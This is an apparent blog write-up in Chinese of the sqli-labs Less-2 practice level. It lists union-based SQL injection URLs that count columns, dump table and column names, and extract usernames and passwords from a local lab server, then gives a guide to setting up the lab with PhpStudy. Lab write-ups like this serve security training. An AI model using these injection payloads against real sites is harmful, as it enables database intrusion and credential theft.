sql-libs——less2

带入执行的SQL语句

$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";

判断列数

http://192.168.0.5:9002/Less-2/?id=1 order by 3
http://192.168.0.5:9002/Less-2/?id=-1 union select 1,2,3

在这里插入图片描述
爆表名

http://192.168.0.5:9002/Less-2/?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()

在这里插入图片描述
爆字段

http://192.168.0.5:9002/Less-2/?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name=%27user%27

在这里插入图片描述爆用户名密码

http://192.168.0.5:9002/Less-2/?id=-1 union select 1,group_concat(username),group_concat(password) from security.users --+

在这里插入图片描述

### 如何搭建SQL库靶场 #### 一、准备工作 为了成功搭建SQL Labs靶场,需先准备好必要的软件和文件。推荐使用PhpStudy Pro来简化这一过程[^2]。 #### 二、下载所需资源 从官方渠道获取最新版本的PHPStudy以及SQL-Labs项目源码包。确保下载链接的安全性和可靠性,避免误入假冒网站造成不必要的麻烦[^1]。 #### 三、安装与配置 PhpStudy 完成下载后按照提示完成PhpStudy的安装流程。启动程序并确认其能够正常运行,在浏览器中输入`http://localhost`验证是否可以顺利访问首页界面[^3]。 #### 四、调整数据库设置 针对SQL-Labs的具体需求,可能需要对默认提供的MySQL/MariaDB实例做一些额外设定。特别是要关注数据库用户的权限分配情况,建议赋予充分的操作权利给指定账户以便顺利完成后续实验任务[^4]。 对于数据库连接部分,具体操作如下: - 找到位于 `C:\phpstudy_pro\WWW\sqli.com\sqli-labs-master\sql-connections` 文件夹内的 `db-creds.inc` 配置文档; - 使用文本编辑器打开该文件,并依据实际情况更新其中涉及的数据源名称(DSN)、用户名及密码字段的内容; - 确认所填信息同本地已有的数据库服务相匹配,尤其是当后者经过自定义更改之后更要注意这一点。 ```bash # 修改后的 db-creds.inc 示例片段 $dsn = 'mysql:host=localhost;dbname=sqli'; $username = 'root'; $password = 'your_modified_password_here'; ``` #### 五、部署 SQL-Labs 应用 将解压得到的SQL-Labs资料放置于适当位置,通常是在Web服务器的工作目录下,例如前述路径中的`sqli.com`子目录内。接着通过浏览器尝试加载对应的URL地址查看应用是否能被正确渲染显示出来。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

midsummer_woo

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值